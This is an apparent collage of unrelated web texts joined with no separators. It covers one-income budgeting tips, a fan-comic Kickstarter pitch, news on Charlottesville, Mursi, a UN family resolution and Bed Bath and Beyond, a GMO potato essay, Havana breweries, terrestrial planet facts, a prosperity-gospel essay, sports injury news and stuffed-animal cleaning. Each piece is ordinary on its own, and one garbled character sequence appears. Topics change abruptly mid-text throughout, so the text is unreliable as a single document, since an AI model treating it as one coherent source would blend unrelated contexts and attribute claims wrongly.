Have the talk: Even if you have your mind made up, this is a joint decision. Discuss the options with your partner. Express your feelings and ask that they give their opinion as well. Maybe you'll decide the husband will provide or maybe it'll be the wife. Discuss which job will afford the lifestyle you're looking for. This includes income, benefits, and schedule. Crunch the numbers: If you're going from 2 incomes down to 1, you can go into financial shock. You'll want to sit down and analyze your budget. Figure out your current expenses, see how much income you'll expect to see with only one working spouse. Decide what you can afford and what you can't. Will you be able to reach your financial goals like vacations or retirement? Do you expect to have more children? Calculate all these instances in your budget. Start downsizing: There are going to be things you won't need or be able to afford on one income that you could with two. Maybe you don't need that second car. You might not need a house with 2 guest rooms if it's costing you more a month. You start to realize cable watches you more than you watch it. Start trimming the fat of your budget, and only keep things that you absolutely need. Save and reduce: On one income, you'll have less money to handle emergencies should they arise. Prepare for them ahead of time. Start building up an emergency fund and paying down your debt. You'll have less to stress about when you have more money to put towards an emergency. Try it out: Going cold turkey with anything can be tough, including drastically going from two incomes to one. Give a try first. Live off the income of the spouse who will be working, and bank the income of the other spouse. Evaluate the trial period. Did you run into some problems? Did you forget you can no longer indulge in all the things you wanted to at first? Assess the situation and make sure it's for you.
When you make the decision to live off one income, it's a lot easier to adjust than if you were thrown into the situation against your will. Taking these steps and precautions will help you ease into the change, and plan for things that may catch you off guard later on.
WHAT IT'S ALL ABOUT
Hey folks, I'm Nate Maurer. I'm a musician by trade, and I make comics (under the name CaptainOsaka) for fun! The one I'm working on these days is a totally bonkers buddy cop action comedy called DOUBLE K (which is itself based on an equally - and awesomely - bonkers animated series called GURREN LAGANN). TV Tropes explains it far more ebulliently and exhaustively than I ever could, so if you want to read more about it, head on over there. And to read the comic itself, head on over here!
It's a labor of love from a fan to fans, but as such, it always has to take a back seat to my day job. UNLESS.....
WE DO THIS THING
Pretty much since the comic began, the wonderful people reading it have graciously offered their support time and time again, wondering about tangible ways to show they DIG IT (as well as helping me to keep a more regular production schedule). Well, dang it, I want to finally give you beautiful folks what you're after - more frequent updates AND rad swag, especially a nice way to enjoy the comic in print!
This Kickstarter project's got three goals. ONE, I want to get a gorgeous print volume of DOUBLE K into the hands of anyone out there who wants one, and I need an accurate head count since - this being a fan-comic and all - I can't just run off a huge stack of copies and sell 'em willy-nilly; the book side of this project is a strictly break-even affair. I can't stress that enough.
TWO, I want to make some awesome, high-quality LEGAL merch (buttons, shirts, shot glasses) inspired by DOUBLE K that anyone would be stoked to own/wear/drink liquor out of. Folks who contribute to this campaign will be getting the very first editions of what could potentially become additions to a righteous, sprawling E-STORE, capable of supporting a speedy schedule for the comic until it is DONE!
THREE, I gotta pay for all this stuff to get made and keep myself alive while I knock out the rest of the book! And here's where you guys figure into the picture in a HUGE way. I've got a first wave of products designed (as you can see in the video), and I've got the rest of the book written and thumbnailed. Just gotta raise the funds to do it up right.
SO! Who will step up? Who will be a total BOSS and say, NATE?! I AM WITH YOU IN THIS LUDICROUS ENDEAVOR ALL THE WAY!! O CAPTAIN MY CAPTAIN or something to that degree?? I hope it will be YOU, friend!!
--------------------------------------------
THANK YOU all so much for checkin' this scene out. You can see more of my stuff at http://captainosaka.deviantart.com , and, as previously mentioned, DOUBLE K can be read at http://doublek.thewebcomic.com.
A brand of Tiki torches is denouncing the use of its products by white supremacists this past weekend in Charlottesville.
White supremacists marched through Charlottesville, Va., Friday night holding Tiki torches ahead of a planned rally in the city the next day.
TIKI said in a Facebook post Saturday that they are not associated in any way with the events that took place in Charlottesville and are "deeply saddened and disappointed" to be included.
ADVERTISEMENT
“We do not support their message or the use of our products in this way. Our products are designed to enhance backyard gatherings and to help family and friends connect with each other at home in their yard,” the post read.
A group of white supremacist protesters shouting "white lives matter" and "you will not replace us" had marched onto the University of Virginia campus with the torches Friday ahead of a planned “Unite the Right” rally to protest the removal of a Confederate statue.
On Saturday, protesters clashed with counterprotesters at the rally, and one counterprotester died and at least 19 others were injured when a car was driven into a crowd. The alleged driver of the car, 20-year-old James Alex Fields Jr., was arrested and charged with second-degree murder, among other charges.
Two Virginia State Police officers were also killed in a helicopter crash that officials linked to the rally.
A great accompaniment to the food is beer. An Outdoor Bier Garten is open for beer sampling for festival-goers who are 21 and over. Different featured breweries will be included each weekend, with a company representative from each of these present on Saturdays.
Along with the authentic German cuisine and beer, you can also look forward to outdoor games and the Bavarian Fun Makers Oompah Band. The band dresses in authentic lederhosen while performing traditional Bavarian folk dances, oompah music, sing-a-longs, yodels, and more! They have multiple performances daily during OktOBERfest.
… And, of course, along with great memories, you'll want to take home souvenirs of this month-long celebration. We have a wide variety of OktOBERfest souvenir apparel, gifts and accessories available in our outdoor vendor tent.
Inside the mall, you'll also want to check out our retail shops … most especially our unique and specific “Beer Necessities” kiosk, which provides an eclectic selection of gifts and accessories for the true beer ( or “bier” ) aficionado.
Last week's announcement that Ireland's environmental protection agency approved the nation's first trial of the genetically modified potato has reactivated the conversation about the spuds, which have actually been kicking around Europe — on a trial basis — since 2010.
Potatoes are an industrial crop; we grow nearly as many of them worldwide as we do corn, soy, wheat, and sugar, and those industries all rely heavily on genetic engineering. And — like corn, sugar, and soy — potato starch is now often valued for its indirect uses, such as in animal feed and biofuel. So it's not surprising that industry forces would be pushing for giant swaths of industrial-starch-producing GMO potatoes. But to do so in Ireland would involve a unique historical irony.
You see, it just so happens that the Irish potato famine of the 19th century is held up as one of the most striking examples of the way monocrops — those grown with little or no genetic diversity — are vulnerable to disease. Heralded as a miracle when it arrived from South America in the 1800s, the potato produced more calories per acre than wheat and corn, and virtually did away with the mass-scale hunger many European countries were facing at the time. (Some say it was the potato that made European nations into world superpowers, and its cultivation also marked the beginning of today's industrial agriculture model.)
Because farmers were only growing very few potato varieties at a time, however, Europe — and in particular Ireland — was an easy target for disease. As historian Charles Mann wrote in 1493: Uncovering the New World Columbus Created, excerpted here in Smithsonian magazine:
In two months [a fungus called] P. infestans wiped out the equivalent of one-half to three-quarters of a million acres. The next year was worse, as was the year after that. The attack did not wind down until 1852. A million or more Irish people died — one of the deadliest famines in history, in the percentage of population lost. A similar famine in the United States today would kill almost 40 million people.
All this makes potatoes a powerful symbol of biodiversity (and lack thereof) in the global food system. But to read this week's news, it's easy to wonder if we'll ever learn our lesson. According to a BBC report, the new GMO potato has been engineered to withstand blight, a dangerous potato disease that “can rapidly turn the vegetable into an inedible mush.” Through genetic splicing, scientists say the new potato now has a resistance gene taken from a wild South American potato.
John Spink, head of crop research at Teagasc, the Irish Agriculture and Food Development Authority that has applied for the license, told the BBC: “You could achieve the same results by conventional breeding, but it might take 15 to 20 years — this way we can do it in weeks.”
Meanwhile, South American nations have maintained an incredibly diverse array of potatoes. Mann writes that as recently as 1995:
… a Peruvian-American research team found that families in one mountain valley in central Peru grew an average of 10.6 traditional varieties — landraces, as they are called, each with its own name. In adjacent villages Karl Zimmerer, an environmental scientist now at Pennsylvania State University, visited fields with up to 20 landraces. The International Potato Center in Peru has preserved almost 5,000 varieties. The range of potatoes in a single Andean field, Zimmerer observed, “exceeds the diversity of nine-tenths of the potato crop of the entire United States.” As a result, the Andean potato is less a single identifiable species than a bubbling stew of related genetic entities.
It's highly likely that in a field where you were growing 20 varieties of potato, at least a few of those would be resistant to whatever disease might come along. And I'm guessing that at least some of those 5,000 varieties already contain traits that are similar to the ones from the wild potato that have been genetically inserted in this GMO variety. And yes, a 15 to 20 year time investment in traditional breeding may sound onerous, when compared to the genetic quick fix. But all this makes me wonder: Is it ever worth making an end run around real biodiversity?
The four-year trial in Ireland is slated to be relatively small — two hectares or around five acres — but it will also probably take place in the open air, where cross-pollination with other potatoes is highly possible. In a related article in the Irish Independent, critics pointed to the fact that GMO crops have also been shown to impact other forms of life in the fields. It reads:
[R]esearch on GM crops in Britain had shown a worrying decline in farmland biodiversity, where numbers of bees and butterflies were found to be 68 [percent] lower in GM fields.
Indeed, that's key to biodiversity — every species lives in relationship to those around it. Potatoes don't grow in a vacuum; and surely the scientists involved know this. But it rarely benefits the companies engineering these products to factor in ecosystem health.
Stella Coffey, an activist who runs a blog called GM Moratorium, told the BBC: “It's absolutely preposterous to use such a risky tech as your first line of action.” And she has a point. You don't have to be convinced that GMOs are inherently unsafe in their own right, or that we should all start growing 20 varieties of potatoes in our backyard (although, if you're a gardening nerd like me, that might sound pretty amazing), to see this tendency for the agriculture community to default to new technology — often simply because it's there and it has the potential to generate revenue for shareholders — as more than a little disturbing. It may not be as risky as it was to feed the whole of nation on just a few varieties of potato in the 1850s, but how can we know that for sure?
Shhh. Did you hear that? I think the ancestors on my Irish side are rolling in their graves.
Correction: This story mistakenly referred to the Amflora potato as being involved in this trial. In actuality, Amflora's trials began in Germany, Sweden and the Netherlands earlier this year.
Bed Bath and Beyond's stock plunged more than 12 percent during extended trading after the company reported same-store sales that fell well below Wall Street's expectations.
The retailer reported a same-store sales decrease of 2.6 percent. Analysts had expected a decrease of 0.7 percent. While comparable sales for the company's digital channels grew more than 20 percent, in-store sales fell by a number in the mid-single-digit percent range.
Bed Bath and Beyond announced sales of about $2.9 billion, a decrease of about 1.7 percent from the same time last year.
The retailer said restructuring costs, Hurricane Harvey and a new accounting standard weighed on its second quarter results.
"How [customers] discover product, their expectations and knowledge around pricing and services offered, and how they share their thoughts about their shopping experiences are all changing rapidly," CEO Steven Temares said Tuesday on a call with analysts and investors.
Temares outlined initiatives Bed Bath and Beyond is pursuing to accomplish that goal. Those mentioned include adopting a new technology model, hiring a new chief information officer and the company's first chief technology officer, and establishing a strategic portfolio management office.
Temares said Bed Bath and Beyond has launched four projects focused on meeting changing customer needs, improving margins, improving the retailer's supply chain and optimizing inventory.
The customer-focused initiative is the furthest along of the four, he said. Realigning the store's management structure, including last month's decision to cut 880 department and assistant store manager positions, falls under that umbrella, he said.
Bed Bath and Beyond expects the initiatives to save $150 million over the next few years, a portion of which may be reinvested in the company.
Online sales represent only 15 percent of Bed Bath and Beyond's sales, Temares said, meaning there is still room for "significant growth."
Bed Bath and Beyond is opening a 525,000-square-foot fulfillment center in Las Vegas this fall, Temares said. It is also expanding its pilot same-day delivery service in Houston, Dallas and Washington, D.C., to include Seattle and two boroughs in New York City.
Too rushed to find a parking space? For a price, this robot will do it for you. (Federico Gambarini/EPA)
Travelers at Dusseldorf Airport in Germany don't even have to park their cars anymore. Last week the airport begin a using self-driving robot that resembles a forklift to deliver some cars to and from an appropriate parking space.
The idea is to get business travelers in and out of an airport as quickly and easily as possible. A driver can pull into a transfer station at the parking lot entrance and leave their car after checking in on a digital touchscreen. Sensors in the station measure the dimensions of the vehicle, and send that information to one of the robots. The robot, called Ray, adjusts its arms to fit the new vehicle, then drives to the transfer station and slides its arms around the tires to lift the vehicle off the ground.
Here's a closer look at a wheel being lifted off the ground. (Serva Transport Systems)
The electric-powered Rays travel at speeds up to 6 mph. Each Ray drives autonomously, guided by laser navigation and mapping software. The Ray knows its exact location thanks to its lasers that bounce off reflectors positioned throughout the garage.
The Ray navigates without crashing into walls or cars with the help of reflectors located on walls and pillars. (Serva Transport Systems)
The company behind the technology, Serva Transport Systems, integrates flight and baggage claim data from the airport into its software, so that a Ray will know to have your car waiting at the garage exit by the time you arrive. If your flight is delayed, it will be aware and wait to deliver your car. And it asks if you'll be checking a bag, so it knows whether to wait to pull your car until after baggage has been delivered to those on your flight.
Chief executive Rupert Koch claims using the Ray can increase a parking structure's capacity by 40 percent. He credits this to more efficiently parking cars, by putting small cars with small cars, and large cars with large cars. For travelers, the convenience costs $40 a day or $5.50 an hour. The current pricing for the parking service, called Premium Plus, is fairly comparable to other options at the airport (full prices here).
Koch says the system could work fine without any human oversight, but the airport is having an employee on hand in case travelers have questions about how to use the new option. The current set-up at Dusseldorf features three Rays, six transfer stations and has room to park up to 249 vehicles. The overwhelming majority of parking spots at Dusseldorf are still of the old-fashioned variety. According to an airport spokesman, 130 vehicles have used the Ray service in its first week, which he said was a soft launch.
Koch sees airports and the end of car assembly lines as the best-use cases for Rays. Automakers generally need to store vehicles in short-term parking as they come off the assembly line, and Ray offers an automated solution.
While shopping malls might find a use for the technology, he acknowledged it wouldn't be a fit at sporting events or music shows, where large crowds exit at the same time.
The 15-person company, based outside Munich, began to tackle the parking challenge in 2010. Its simplest system, including two Rays, two transfer stations and the relevant software, costs almost $1.2 million. Serva Transport Systems isn't currently profitable, but Koch is optimistic given the interest he's had from other airports that the company will turn a profit next year.
Deputy Prime Minister Barnaby Joyce says the Nationals will "drive a hard bargain" in the next Parliament, including a likely extra position in cabinet, but that he wants to keep secret the conditions of a written agreement to be signed with the Liberal Party.
When Malcolm Turnbull was elevated to the prime ministership last September he signed a new Coalition agreement with then Nationals leader Warren Truss.
Although never released publicly, the agreement was widely reported to include support for a new "effects test" in competition law, a plebiscite on same-sex marriage, more support for stay-at-home mothers and the return of the water portfolio to the Nationals.
Asked what he would be pushing for under a new agreement with Mr Turnbull following the election, Mr Joyce told Sky News on Sunday: "The first aspiration is the agreement remains confidential. That's aspiration one, two, three, four, five and six."
While the older generation of Cubans seem to stick to the local rum (I don't blame them) and the mass-produced beer such as Cristal and Bucanero, the younger generation started to discover craft beer. There are now two Microbreweries operating in Havana, and more and more Cubans are discovering the art of Craft Beer.
If you are a frequent traveller around the world, be sure to check out this post about the best craft beer cities around the world.
So far, the only microbreweries in Havana and Cuba are Factoria Plaza Vieja in the old town of Havana (this is by far the most touristy one as most of the customers here are foreign tourists) and Cerveceria Antiguo Almacen de la Madera y El Tabaco in an old cigar factory next to the waterfront. Most customers here are locals.
Both microbreweries sell only three types of beer Clara, Oscura, and Negra. Light, darker or black beer.
Be in mind that both places open at noon (12.00).
Factoria Plaza Vieja.
Factoria Plaza Vieja is located on Plaza Vieja which is one out of the four important town squares in Havana, and a major tourist site in itself. So it's easy to see why this microbrew is very touristy. So this is also a great spot for people watching while having a beer.
There is no sign that says anything about the % in the beer, but the waiter told me all of the beers are around 4,6%. All the beers cost 2,5 CUC each for a Jarras, and 12 CUC for a 3L tower. The three beers are decent and refreshing, but they do not taste much, not even the black one.
Cerveceria Antiguo Almacen de la Madera y El Tabaco.
The second microbrewery in Havana is my personal favourite.
This brewery with a way to long name to write is located on the waterfront right next to the famous tourist market “Antiguos Almacenes San José”.
The brewery is located inside a massive hangar, that used to be a Tabaco factory. It holds the largest bar in all of Cuba, a 37m / 121ft long and can serve up to 400 people.
The beer tasted very similar to the ones at Factoria Plaza Vieja. Except from the colour difference between the beers, there wasn't much taste difference.
Probably the best thing with this brewery is the location, while Factoria Plaza Vieja is located on a historical square inside the old city, with no natural breeze at all. The Cerveceria Antiguo Almacen de la Madera y El Tabaco offers a lot of natural breeze due to its location right next to the waterfront.
Overall none of the microbreweries in Havana is as good as European or American craft beers, but both hold locations that most microbrews can just dream of. I visited Cerveceria Antiguo Almacen de la Madera y El Tabaco most during my visit to Havana, not because of the beer, but rather the relaxing location.
Like It?Drink It! Share it!
The four innermost planets of our solar system (Mercury, Venus, Earth and Mars) are called the “terrestrial” planets. The name comes from the word “telluric” derived from the Latin words “terra” and “tellus”, used to refer to Earth. They are made mostly of silicate rocks and metals, with solid surfaces and atmospheres that range from thick (on Venus) to very thin (on Mercury). Earth is the only one with liquid oceans, although Mars may have had them in the past.
Terrestrial Planet Sizes
Name Diameter Distance from the Sun Orbit Period Mercury 4,879 km 57,909,227 km (0.39 AU) 88 days
Venus 12,104 km 108,209,475 km (0.73 AU) 225 days
Earth 12,742 km 149,598,262 km (1 AU) 365.24 days
Mars 6,779 km 227,943,824 km (1.38 AU) 687 days
Facts about the Terrestrial Planets
The terrestrial planets in our solar system orbit relatively close to the Sun, this gives them their other name; the “Inner Planets”
Earth is the most hospitable to life. Mars may have supported life in the past, but there is no evidence that conditions have ever been life-friendly on Mercury or Venus.
Each of the terrestrial planets has a central core made mostly of iron. The layer above the core is called the “mantle” and is usually made of silicate rocks. These are rocks rich in silicon and oxygen. The terrestrial planets are also sometimes referred to as the “rocky” planets.
The surfaces of terrestrial planets have mountains, craters, canyons, and volcanoes. About 75% of Earth's surface is covered in water. Both Mars and Earth have permanent polar ice caps.
None of the terrestrial planets in our solar system have ring systems. Planetary scientists suspect that they may once have had rings that have since disappeared.
There is one dwarf planet considered to be terrestrial-type world: Ceres. It has a rocky core and an outer mantle, with surface features such as craters and mountains.
Terrestrial planets exist around other stars. Data from the Kepler mission suggest Earth-sized and so-called “super-Earth” worlds exist throughout the galaxy. There could be up to 40 billion such exoplanets in the Milky Way.
The Inner Planets
Find out more about the inner planets by selecting one below.
My neighbor wasn't trying to sell him a spiritual guarantee. But there was a reason she wanted to fill that silence around why some people die young and others grow old and fussy about their lawns. She wanted some kind of order behind this chaos. Because the opposite of #blessed is leaving a husband and a toddler behind, and people can't quite let themselves say it: “Wow. That's awful.” There has to be a reason, because without one we are left as helpless and possibly as unlucky as everyone else.
One of the most endearing and saddest things about being sick is watching people's attempts to make sense of your problem. My academic friends did what researchers do and Googled the hell out of it. When did you start noticing pain? What exactly were the symptoms, again? Is it hereditary? I can out-know my cancer using the Mayo Clinic website. Buried in all their concern is the unspoken question: Do I have any control?
I can also hear it in all my hippie friends' attempts to find the most healing kale salad for me. I can eat my way out of cancer. Or, if I were to follow my prosperity gospel friends' advice, I can positively declare that it has no power over me and set myself free.
The most I can say about why I have cancer, medically speaking, is that bodies are delicate and prone to error. As a Christian, I can say that the Kingdom of God is not yet fully here, and so we get sick and die. And as a scholar, I can say that our society is steeped in a culture of facile reasoning. What goes around comes. Karma is a bitch. And God is always, for some reason, going around closing doors and opening windows. God is super into that.
The prosperity gospel tries to solve the riddle of human suffering. It is an explanation for the problem of evil. It provides an answer to the question: Why me? For years I sat with prosperity churchgoers and asked them about how they drew conclusions about the good and the bad in their lives. Does God want you to get that promotion? Tell me what it's like to believe in healing from that hospital bed. What do you hear God saying when it all falls apart?
The prosperity gospel popularized a Christian explanation for why some people make it and some do not. They revolutionized prayer as an instrument for getting God always to say “yes.” It offers people a guarantee: Follow these rules, and God will reward you, heal you, restore you. It's also distressingly similar to the popular cartoon emojis for the iPhone, the ones that show you images of yourself in various poses. One of the standard cartoons shows me holding a #blessed sign. My world is conspiring to make me believe that I am special, that I am the exception whose character will save me from the grisly predictions and the CT scans in my inbox. I am blessed.
The prosperity gospel holds to this illusion of control until the very end. If a believer gets sick and dies, shame compounds the grief. Those who are loved and lost are just that — those who have lost the test of faith. In my work, I have heard countless stories of refusing to acknowledge that the end had finally come. An emaciated man was pushed about a megachurch in a wheelchair as churchgoers declared that he was already healed. A woman danced around her sister's deathbed shouting to horrified family members that the body can yet live. There is no graceful death, no ars moriendi, in the prosperity gospel. There are only jarring disappointments after fevered attempts to deny its inevitability.
CAIRO (Reuters) - Egyptian President Mohamed Mursi vowed to stay in power and defend constitutional legitimacy on Wednesday as generals worked on plans to push the Islamist aside within the day and suspend the constitution.
In a defiant midnight television address responding to military demands that he share power with his opponents or see the army impose its own solution, Mursi warned that any deviation from the democratic order approved in a series of votes last year would lead Egypt down a dangerous path.
He was speaking as vast crowds of protesters rallied in central Cairo and across the nation to demand the Muslim Brotherhood politician's resignation in a third night of mass demonstrations. His supporters also turned out and some were involved in clashes with security forces at Cairo University.
“The price of preserving legitimacy is my life,” Mursi said in an impassioned, repetitive, 45-minute ramble. “Legitimacy is the only guarantee to preserve the country.”
In a warning aimed as much at his own militant supporters as at the army, he said: “We do not declare jihad (holy war) against each other. We only wage jihad on our enemies.”
Urging Egyptians not to heed the siren calls of what he called remnants of the former authoritarian regime, “the deep state” and the corrupt, he said: “Don't be fooled. Don't fall into the trap. Don't let them steal your revolution.”
An opposition spokesman called Mursi's defiance “an open call for civil war”. Peaceful protests would go on, he said.
On Monday, army commander General Abdel Fattah al-Sisi gave Mursi 48 hours to reach accommodation with his opponents. Otherwise, he said, the military would step in and implement its own roadmap for the country's future.
A military spokesman said the armed forces would not comment on the president's statement until Wednesday afternoon. The deadline is set to expire at 5 p.m. (1500 GMT).
Condemning a coup against their first freely elected leader, tens of thousands of Muslim Brotherhood supporters took to the streets, clashing with opponents in several towns. But they were dwarfed by anti-government protesters who turned out in their hundreds of thousands across the nation.
Security sources said dozens of people were wounded in the clashes at Cairo University involving Mursi supporters. Witnesses heard gunfire and teargas was used by the authorities.
TROOPS ON ALERT
Troops were on alert amid warnings of a potential civil war. Seven people died in a demonstration crush and sporadic fighting in Cairo and hundreds more were wounded in the provinces.
“Mursi - Game Over - Out”, proclaimed a laser display beamed over the capital's jam-packed Tahrir Square, where Egyptians danced with joy, recalling the euphoria and the slogans that greeted the overthrow of Hosni Mubarak two years ago. The light show counted the hours to the army deadline.
Despite his fighting talk, time appears to have all but run out for Mursi, as liberal leaders refuse to talk to him, while ministers have resigned and aides abandoned his sinking ship.
Military sources told Reuters that, assuming the politicians fail to end a year of deadlock before the deadline, the generals have their own draft program ready to implement - though it could be fine-tuned in consultation with willing political parties.
Under the roadmap, the military would install an interim council, composed mainly of civilians from different political groups and experienced technocrats, to run the country until an amended constitution was drafted within months.
That would be followed by a new presidential election, but parliamentary polls would be delayed until strict conditions for selecting candidates were in force, the sources said.
They would not say how the military intended to deal with Mursi if he refused to go quietly. Some of his Islamist supporters have vowed to defend what they see as the legitimate, democratic order, even if it means dying as martyrs. And some have a history of armed struggle against the state.
TROOPS
The confrontation has pushed the most populous Arab nation closer to the brink of chaos amid a deepening economic crisis two years after the overthrow of Mubarak, raising concern in Washington, Europe and neighboring Israel.
Troops intervened to break up clashes in the Mediterranean city of Alexandria. They were also out on the streets of Suez and Port Said, at either end of the Suez Canal. The waterway is vital to world trade and to Egypt's struggling economy.
Egypt's Coptic Pope, spiritual leader of the country's 10 percent Christian minority, expressed open support for the anti-Mursi “Tamarud - Rebel!” movement in a tweet, voicing support for the national trio of people, army and youth.
The leading Muslim religious authority, Al-Azhar, called for the will of the people to prevail peacefully.
Mursi met Sisi for a second day, his office said, along with Prime Minister Hisham Kandil but there was no sign of any meeting of minds.
Though Mursi has held out repeated offers of dialogue, liberal opponents accuse him and the Brotherhood of bad faith and have ruled out starting talks with him before the deadline.
After that, former U.N. nuclear agency chief Mohamed ElBaradei will deal directly with the military on behalf of the main coalition of liberal parties. Also planning to take part are leaders of the Tamarud youth movement, which initiated mass rallies on Sunday that the army says prompted it to act.
Among figures being considered as an interim head of state was the new president of the constitutional court, Adli Mansour.
Anti-Mursi protesters listen to Egyptian President Mohamed Mursi's speech at a public cafe near the main square where they gathered for the third day in Alexandria, July 2, 2013. Mursi concluded an address to the nation early on Wednesday by pledging to continue to carry out his democratic duties and to defend the legitimate order enshrined in law. REUTERS/Asmaa Waguih
The new transition arrangements would be entirely different from the military rule that followed Mubarak's fall and more politically inclusive, the sources said.
Then, the ruling armed forces' council was criticized by liberal and left-wing politicians for failing to enact economic and political reforms - and for siding with the Brotherhood.
FIGHTING
The Brotherhood's political wing called for mass counter- demonstrations to “defend constitutional legitimacy and express their refusal of any coup”, raising fears of violence. But the biggest pro-Mursi rally in the Cairo suburb appeared to attract around 100,000 supporters, Reuters journalists said.
The Brotherhood long avoided direct confrontation with the security forces despite suffering oppression under Mubarak.
The United States, which has previously defended Mursi's legitimacy as a democratically elected leader, stepped up pressure on him to heed the mass protests but stopped short of saying he should step down.
President Barack Obama told Mursi in a phone call late on Monday that the political crisis could only be solved by talks with his opponents, the White House said. Secretary of State John Kerry hammered home the message in a call to his outgoing Egyptian colleague on Tuesday.
That prompted Mursi to say in a tweet that he would not be “dictated to internally or internationally”.
At least six ministers who are not Brotherhood members have tendered their resignations since Sunday, including Foreign Minister Mohamed Kamel Amr. The president's two spokesmen and the cabinet spokesman also quit on Tuesday and nearly 150 Egyptian diplomats signed a petition urging Mursi to go.
Senior Brotherhood politician Mohamed El-Beltagy denounced what he called a creeping coup. He said he expected the High Committee for Elections to meet within hours to consider annulling the 2012 presidential election.
The United States has long funded the Egyptian army as a key component in the security of Washington's ally Israel.
General Martin Dempsey, chairman of the U.S. Joint Chiefs of Staff, spoke to his Egyptian counterpart on Monday. It is unclear how far the military has informed, or coordinated with, its U.S. sponsors but an Egyptian official said a coup could not succeed without U.S. approval.
A senior European diplomat said that if the army were to remove the elected president, the international community would have no alternative but to condemn it.
Yasser El-Shimy, Egypt analyst at the International Crisis Group, said the army ultimatum had hardened positions, making it very difficult to find a constitutional way out of the crisis.
“Things could deteriorate very rapidly from there, either through confrontations on the street, or international sanctions,” he said.
Slideshow (9 Images)
“Mursi is calling their bluff, saying to them, ‘if you are going to do this, you will have to do it over my dead body'.”
For many Egyptians, fixing the economy is key. Unrest since Mubarak fell has decimated tourism and investment and state finances are in poor shape, drained by extensive subsidies for food and fuel and struggling to provide regular supplies.
The Cairo bourse, reopening after a holiday, shot up nearly 5 percent after the army's move.
At UN, India Votes In Favour Of Resolution That Excludes LGBT Families
United Nations Human Rights Council has passed a resolution on the “Protection of Families” with the resolution not recognizing family outside of the heterosexual family structure, thus excluding all LGBT families from its ambit. LGBT rights supporters see it as a major defeat at the international stage, which may open the door for more such resolutions aimed at specifically excluding LGBTs.
The resolution was introduced by Egypt, and was backed by a host of countries like Russia, Uganda and Qatar, known for their anti-gay stance. The resolution calls for the High Commissioner for Human Rights to prepare a report on the status of the family and instructs the Human Rights Council to convene a “panel discussion” at its next session on the subject.
Uruguay, Chile, Ireland and France tried to introduce an amendment to make the language more inclusive of the different kind of families, including single parents and LGBT families, but it was blocked by Russia. On the other hand, Saudi Arabia and Pakistan had tried to introduce an amendment restricting the definition of marriage between a man and a woman, but withdrew it after the LGBT inclusive definition was rejected.
The resolution was finally passed with a 26-14 votes, with six countries abstaining from voting. India joined the club of countries that voted in favour of the resolution. Along with India, other countries that voted in favour of the resolution were Algeria, Benin, Botswana, Burkina Faso, China, Congo, Ivory Coast, Ethiopia, Gabon, Indonesia, Kazakhstan, Kenya, Kuwait, Maldives, Morocco, Namibia, Pakistan, Philippines, Russia, Saudi Arabia, Sierra Leone, South Africa, United Arab Emirates, Venezuela and Vietnam. Many of these countries are known for their harsh anti-gay laws and opposition to LGBT rights.
Austria, Chile, Czech Republic, Estonia, France, Germany, Ireland, Italy, Japan, Montenegro, South Korea, Romania, the UK and United States voted against the resolution.
This move by India is a significant departure from the recent past, when it has voted in favour of resolutions supporting/including LGBT people or organizations.
Joakim Noah separates his left shoulder and does not return as the Bulls fall to the Mavericks 83-77. (1:39)
CHICAGO -- Bulls center Joakim Noah will undergo left shoulder surgery and is expected to be out four to six months, the team said Saturday night.
Noah dislocated his shoulder during Friday's loss to the Dallas Mavericks after getting tangled up with Mavs center JaVale McGee in the second quarter.
The Bulls said in a news release that the shoulder dislocation was "reduced in the training room" Friday night and was evaluated at Midwest Orthopaedics at Rush in Chicago, where it was determined that he will undergo surgery to stabilize his left shoulder.
Editor's Picks Without catalyst Joakim Noah, Bullsâ outlook diminished Joakim Noah may have played his last game for the Chicago Bulls and without him their chances in the Eastern Conference playoffs have lessened.
"The details of the timing, location, and rehabilitation program have not yet been finalized," the Bulls said in the statement. "Noah is expected to have a full recovery,"
Noah's shoulder appeared to pop out of place, and he began to scream in pain. He went straight to the locker room with his arm dangling by his side. An MRI on Saturday revealed the need for surgery, which will probably end his season.
While Noah's teammates said Friday night that they weren't sure of the severity of the injury, they could tell it was serious based on how he looked and sounded.
Bulls power forward Taj Gibson said the way he felt about Noah's injury was similar to when teammate Derrick Rose went down with his first knee injury, a torn ACL in his left knee in April 2012.
"You've been going to war with this guy, all kind of different circumstances over eight years, a guy that you pride yourself with especially in practice on a daily basis and he's one of the emotional leaders on this team," Gibson said. "It kind of hits you in the heart seeing him on the bench, seeing him on that table like that. I kind of got flashbacks to how when Derrick got hurt. You don't want to see your man go down like that. It was frustrating."
Noah struggled throughout the season adjusting to a new role off the bench under first-year coach Fred Hoiberg, but he remained the heart and soul of this group through good times and bad.
"It hurt," Rose said of seeing Noah in pain Friday. "It hurt. Just knowing how hard he works, how [much] he wants to be on the court, how much he means to this team. It's devastating."
In the short term, Noah's absence means more time for rookie Bobby Portis in the rotation. However, in the bigger picture, there is a chance Noah might have played his last game with the Bulls. He will become an unrestricted free agent after the season.
This isn't the first time Noah has dealt with a left shoulder injury. He initially injured his left shoulder Dec. 21, and missed almost a month with a slight tear.
It's bad enough that people are casting a fluorescent pall with their CFLs. Historic building owners in Scotland may soon be able to install double-glazed windows. What is this world coming to, anyway? [joking] Climate change awareness and high energy bills are the logical answers.
Rising fuel costs and environmental concerns have forced councillors to consider lifting a ban on double glazed windows in Edinburgh's most historic buildings. Hundreds of residents in and around the New Town are currently prevented from replacing their draughty old windows, because of fears that double glazing would change the appearance of their properties.
A lot more changes to local zoning codes are coming, all around the world. The tipping point is still a long way off, following which most local units of government will do comprehensive reviews of zoning, relative to energy efficiency. But the day is coming. Via:: The Scotsman, , City U-turn over double glazing ban in the frame Image credit:: Carberry Tower
Stuffed animals are like real animals. The older the get, the more care they need. In order to clean a very old stuffed animal you have to have a special approach.
In order to clean a very old stuffed animal first you have to spend some time preparing. Consider how old the toy is and what materials it has been made out of. There are old stuffed animals that are stuffed with straw for example and for them a washing machine treatment is a big no-no.
A stuffed animal can also be so old, that it has to be handled with care in order not to fall apart, tear or something else. This also means you should not use a washing machine.
If you want to remove lice or dust mites, follow the classic steps – put the toy in a plastic bag and then in the freezer for a few days.
If there is too much dust built up on the toy, use a vacuum cleaner. Put it on a low power setting and use a brush attachment. Take your time and with slow, gentle motions vacuum the toy.
If the stuffed animal is too dirty, then use the classic baking soda treatment. After you are done again vacuum the toy well, to remove all of the excess baking soda that will get into the fur.
If the toy in question is in good condition, you can do a surface wash. This means that you should get a bowl with warm soapy water and a sponge. With the moist sponge and slow gentle motions, clean the surface of the toy. Do small areas at a time and with not too much water. Then clean the sponge in clear water and use it to remove the soap from the toy.
